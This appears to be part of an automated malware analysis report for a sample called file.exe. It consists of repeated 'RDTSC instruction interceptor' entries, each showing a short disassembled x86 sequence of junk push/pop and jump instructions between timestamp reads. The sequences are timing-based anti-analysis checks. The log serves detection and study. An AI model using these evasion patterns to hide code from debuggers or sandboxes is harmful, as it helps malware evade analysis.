              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50344 second address: A50352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF7B0C9CD4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50352 second address: A5036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF7B0F3BFCAh 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 jp 00007FF7B0F3BFC8h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5036E second address: A50374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5065F second address: A50669 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50669 second address: A50685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FF7B0C9CD46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50685 second address: A50692 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5095D second address: A50961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50C36 second address: A50C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF7B0F3BFC6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50D8B second address: A50D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50EDE second address: A50EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50EE2 second address: A50EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A511C0 second address: A511C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A511C8 second address: A511CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E09 second address: A57E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E1A second address: A57E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007FF7B0C9CD4Eh 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jbe 00007FF7B0C9CD46h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E4F second address: A57E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E53 second address: A57E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF7B0C9CD46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA082 second address: 9DA086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA086 second address: 9DA08A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA08A second address: 9DA090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56CB6 second address: A56CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A570E4 second address: A570EE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57212 second address: A57237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF7B0C9CD46h 0x0000000a jmp 00007FF7B0C9CD4Ah 0x0000000f jmp 00007FF7B0C9CD4Dh 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A574D8 second address: A574DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A574DC second address: A574FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF7B0C9CD56h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A574FC second address: A5751A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7B0F3BFCEh 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FF7B0F3BFC6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5751A second address: A5752B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A577DD second address: A577E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A577E3 second address: A5781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0C9CD53h 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c jo 00007FF7B0C9CD57h 0x00000012 jmp 00007FF7B0C9CD4Bh 0x00000017 jp 00007FF7B0C9CD46h 0x0000001d jnp 00007FF7B0C9CD52h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5781C second address: A5783F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF7B0F3BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FF7B0F3BFD5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5783F second address: A57850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA2D second address: A5BA33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA33 second address: A5BA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0C9CD50h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA49 second address: A5BA5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7B0F3BFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA5C second address: A5BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0C9CD4Ah 0x0000000b jns 00007FF7B0C9CD46h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FF7B0C9CD46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA7D second address: A5BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA81 second address: A5BA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA85 second address: A5BA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA8B second address: A5BAA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD54h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B313 second address: A5B317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B317 second address: A5B31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B31B second address: A5B323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B486 second address: A5B49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7B0C9CD46h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jg 00007FF7B0C9CD48h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5B49F second address: A5B4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5B750 second address: A5B754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5DEA7 second address: A5DEAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A642F4 second address: A642F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A642F8 second address: A64321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FF7B0F3BFDEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A64321 second address: A6433E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF7B0C9CD46h 0x0000000f jnl 00007FF7B0C9CD46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6446F second address: A64473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A64473 second address: A6449F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7B0C9CD53h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6463F second address: A64649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7B0F3BFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A64649 second address: A6464F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A64A77 second address: A64A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69498 second address: A6949D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69639 second address: A69640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69640 second address: A69655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7B0C9CD50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69655 second address: A6965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6965B second address: A69664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69664 second address: A6966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF7B0F3BFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69ADF second address: A69AFA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF7B0C9CD51h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69AFA second address: A69B29 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7B0F3BFE1h 0x00000008 jmp 00007FF7B0F3BFD9h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69B29 second address: A69B39 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0C9CD52h 0x00000008 jc 00007FF7B0C9CD46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69B39 second address: A69B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007FF7B0F3BFC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69B47 second address: A69B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A69DEF second address: A69DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C7CC second address: A6C7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C7D0 second address: A6C7D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C7D9 second address: A6C7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7B0C9CD46h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jc 00007FF7B0C9CD5Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C7F1 second address: A6C7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C950 second address: A6C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0C9CD4Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C964 second address: A6C96A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C96A second address: A6C96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6C96E second address: A6C974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6CAF5 second address: A6CAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7474A second address: A7474E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7474E second address: A7475D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FF7B0C9CD46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BE01 second address: A7BE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BE0B second address: A7BE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BE10 second address: A7BE17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BE17 second address: A7BE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF7B0C9CD46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BE26 second address: A7BE2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BF6B second address: A7BF7F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0C9CD46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FF7B0C9CD5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7BF7F second address: A7BFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD2h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF7B0F3BFD6h 0x00000010 jmp 00007FF7B0F3BFD7h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C281 second address: A7C29D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD56h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C29D second address: A7C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C433 second address: A7C447 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FF7B0C9CD4Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C447 second address: A7C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C459 second address: A7C470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C9E6 second address: A7C9F0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7C9F0 second address: A7CA1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD51h 0x00000007 jo 00007FF7B0C9CD52h 0x0000000d jbe 00007FF7B0C9CD46h 0x00000013 jne 00007FF7B0C9CD46h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7CA1B second address: A7CA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8355E second address: A83577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD53h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A83577 second address: A8358E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8358E second address: A83592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A83592 second address: A83598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A83598 second address: A835AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF7B0C9CD4Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8374C second address: A83753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A838CA second address: A838D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A838D0 second address: A838D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A838D6 second address: A838E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A838E7 second address: A838ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A838ED second address: A83919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF7B0C9CD55h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A82BC7 second address: A82BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
